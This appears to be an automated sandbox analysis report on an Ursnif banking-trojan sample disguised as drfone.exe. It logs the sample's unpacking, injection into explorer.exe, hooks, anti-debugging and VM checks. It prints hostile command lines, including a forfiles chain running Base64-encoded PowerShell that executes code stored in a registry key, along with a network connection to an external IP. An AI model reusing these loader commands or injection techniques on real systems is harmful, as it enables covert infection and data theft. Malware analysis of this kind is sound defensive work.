Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: drfone.exe ReversingLabs: Detection: 14%
Source: unknown Process created: C:\Users\user\Desktop\drfone.exe 'C:\Users\user\Desktop\drfone.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17416 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82952 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82954 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17426 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82958 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17434 /prefetch:2
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start /min forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\forfiles.exe forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe /k 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE3A5.tmp' 'c:\Users\user\AppData\Local\Temp\xqhvpwja\CSC8240488428EC4188955E47238990560.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF2B8.tmp' 'c:\Users\user\AppData\Local\Temp\r1g0ykja\CSC64F5131A8743441E92CD84029AD3C82.TMP'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82952 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82954 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17426 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82958 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17434 /prefetch:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\cmd.exe /k 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE3A5.tmp' 'c:\Users\user\AppData\Local\Temp\xqhvpwja\CSC8240488428EC4188955E47238990560.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF2B8.tmp' 'c:\Users\user\AppData\Local\Temp\r1g0ykja\CSC64F5131A8743441E92CD84029AD3C82.TMP'
Source: C:\Users\user\Desktop\drfone.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: drfone.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.458052890.000002253C6E0000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.469189795.0000020232DA0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000027.00000000.496074422.00000000075A0000.00000002.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.pdbXP8a source: powershell.exe, 00000020.00000002.511653294.00000276C6894000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.pdb source: powershell.exe, 00000020.00000002.511653294.00000276C6894000.00000004.00000001.sdmp
Source: Binary string: Make Time=%d, Break Time=%dCSpkp::Init - Aec init failed cs-uri-query-- %d -- %d-- %d -- %d (timeout %d sec)There is not enough space for the configuration database on the diskm_SquareRootVariance = %f (Mse=%f,PowerLimit=%f[dBm])EV_MMAC_RESET_COMPLETEAmos/DataPumpsIN Power Limits !da_join failed, thread %lu: %sC:\Program Files\new_project\src\project.pdbVirtualAllockernel32expecting numeric value.kernel32RJPNULL@ source: drfone.exe
Source: Binary string: :C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.pdb source: powershell.exe, 00000020.00000002.511653294.00000276C6894000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.pdbXP8a source: powershell.exe, 00000020.00000002.511729573.00000276C6900000.00000004.00000001.sdmp
Source: Binary string: C:\Program Files\new_project\src\project.pdb source: drfone.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000027.00000000.496074422.00000000075A0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\drfone.exe Unpacked PE file: 0.2.drfone.exe.400000.0.unpack .text:ER;.data:W;.idata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\drfone.exe Unpacked PE file: 0.2.drfone.exe.400000.0.unpack
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02C13AC8 push esp; retf 4810h 32_2_00007FFD02C13BB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD08AB push edx; retf 32_2_00007FFD02CD08AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD0896 push ss; ret 32_2_00007FFD02CD0897

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: ntdll.dll function: NtCreateUserProcess address: 7FFD88ECF200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW address: AA8388
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: NtCreateUserProcess new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\drfone.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4311
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep count: 3545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep count: 4311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Code function: 39_2_02DB2F10 FindFirstFileW,FindNextFileW,FindClose, 39_2_02DB2F10
Source: explorer.exe, 00000027.00000000.496908397.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000027.00000000.496865135.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000027.00000000.491848394.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000027.00000000.496865135.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000027.00000000.496699584.00000000082E2000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA+
Source: explorer.exe, 00000027.00000000.496699584.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000027.00000000.496699584.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000027.00000000.496908397.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000027.00000002.716897951.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE088D78 CheckRemoteDebuggerPresent,NtSetInformationProcess, 32_2_00000276DE088D78
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 45.142.215.100 187
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.0.cs
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded iex (gp 'HKCU:\Software\Solutionsys').D
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded iex (gp 'HKCU:\Software\Solutionsys').D
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\drfone.exe Memory written: PID: 3440 base: 8B2B20 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 8B2B20 value: 00
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\drfone.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 5056 72006500640069
Writes to foreign memory regions
Source: C:\Users\user\Desktop\drfone.exe Memory written: C:\Windows\explorer.exe base: 8B2B20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 8B2B20
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE3A5.tmp' 'c:\Users\user\AppData\Local\Temp\xqhvpwja\CSC8240488428EC4188955E47238990560.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF2B8.tmp' 'c:\Users\user\AppData\Local\Temp\r1g0ykja\CSC64F5131A8743441E92CD84029AD3C82.TMP'
Source: explorer.exe, 00000027.00000000.480943943.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000027.00000000.480626157.00000000008B8000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000027.00000000.480943943.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000027.00000000.480943943.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY
Behavior Graph:

(Rendered as an image in the original report; the text below is what can be recovered from it.)

Behavior Graph ID: 333865  Sample: drfone.exe  Startdate: 24/12/2020  Architecture: WINDOWS  Score: 100

Signatures on the sample: Multi AV Scanner detection for submitted file; Yara detected Ursnif; Sigma detected: Dot net compiler compiles file from suspicious location; 6 other signatures

Process tree (node numbers as in the graph):
  cmd.exe (10)
    forfiles.exe (17)
      cmd.exe (32) - Encrypted powershell cmdline option found
        powershell.exe (37) - Injects code into the Windows Explorer (explorer.exe); Sets debug register (to hijack the execution of another thread); Writes to foreign memory regions; 3 other signatures
          dropped: C:\Users\user\AppData\...\xqhvpwja.cmdline (UTF-8); C:\Users\user\AppData\Local\...\r1g0ykja.0.cs (C++)
          explorer.exe (41, injected) - System process connects to network (likely due to code injection or exploit)
